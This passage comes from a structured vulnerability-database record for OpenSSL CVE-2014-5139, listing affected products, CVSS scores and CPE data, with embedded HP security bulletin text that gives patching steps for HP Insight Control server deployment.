"trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.1" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.32" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "69077" }, { "db": "NVD", "id": "CVE-2014-5139" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-5139" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "131254" } ], "trust": 0.7 }, "cve": "CVE-2014-5139", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-5139", "trust": 1.0, "value": "MEDIUM" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-5139" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl_set_client_disabled function in t1_lib.c in OpenSSL 1.0.1 before 1.0.1i allows remote SSL servers to cause a denial of service (NULL pointer dereference and client application crash) via a ServerHello message that includes an SRP ciphersuite without the required negotiation of that ciphersuite with the client. OpenSSL is prone to a local denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. \nOpenSSL 1.0.1 prior to 1.0.1i are vulnerable. \n\nReferences:\n\nCVE-2014-3566\nCVE-2014-5139\nSSRT101916\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nContact vcemsdksupportteam@hp.com to request the HP Virtual Connect\nEnterprise Manager SDK v7.4.1 or later. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04624296\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04624296\nVersion: 1\n\nHPSBMU03304 rev.1 - HP Insight Control server deployment on Linux and\nWindows, Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-04-01\nLast Updated: 2015-04-01\n\nPotential Security Impact: Remote disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH), HP Smart Update Manager (SUM), and HP Version\nControl Agent (VCA) which are components of HP Insight Control server\ndeployment. These vulnerabilities are related to the SSLv3 vulnerability\nknown as \"Padding Oracle on Downgraded Legacy Encryption\" or \"POODLE\". The\ncomponents of HP Insight Control server deployment could be exploited\nremotely to allow disclosure of information. \n\nHP Insight Control server deployment includes HP System Management Homepage\n(SMH), HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and\ndeploys them through the following jobs. This bulletin provides the\ninformation needed to update the vulnerable components in HP Insight Control\nserver deployment. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\nUpgrade Proliant Firmware\n\nReferences:\n\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\nCVE-2014-5139\nSSRT102004\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-3513 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following instructions to resolve this vulnerability. \n\nNote: For HP Insight deployment Control server v7.1.2, v7.2.0, v7.2.1 and\nv7.2.2, you must upgrade to v7.3.1 and follow the steps from 1 to 11\nmentioned below to resolve the vulnerability. \n\nDelete the files smh*.exe from Component Copy Location listed in the\nfollowing table, rows 1 and 2. \nDelete the files vca*.exe/vcaamd64-*.exe from Component Copy Location listed\nin the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-bd2042a1c7574aad90c4839efe\n smhamd64-cp023964.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-062078f1ae354b7e99c86c151c\n smhx86-cp023963.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-7b23e47d5d9b420b94bd1323eb\n vcax86 cp025295.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-2557aa7dc1654cf6b547c1a9e4\n vcaamd64-cp025296.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-5827037475e44abab586463723\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\n6\n http://www.hp.com/swpublishing/MTX-57ab6bb78b6e47a18718f44133\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\n7\n http://www.hp.com/swpublishing/MTX-34bcab41ac7e4db299e3f5f2f1\n smhx86-cp025274.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\n8\n http://www.hp.com/swpublishing/MTX-00eb9ac82e86449e8c3ba101bd\n smhamd64-cp025275.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\nDownload and extract the HP SUM component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p991570621/v99346\n\nCopy all content from extracted folder and paste at\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on the target running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on the target running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on the target running\nRHEL 6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on the target 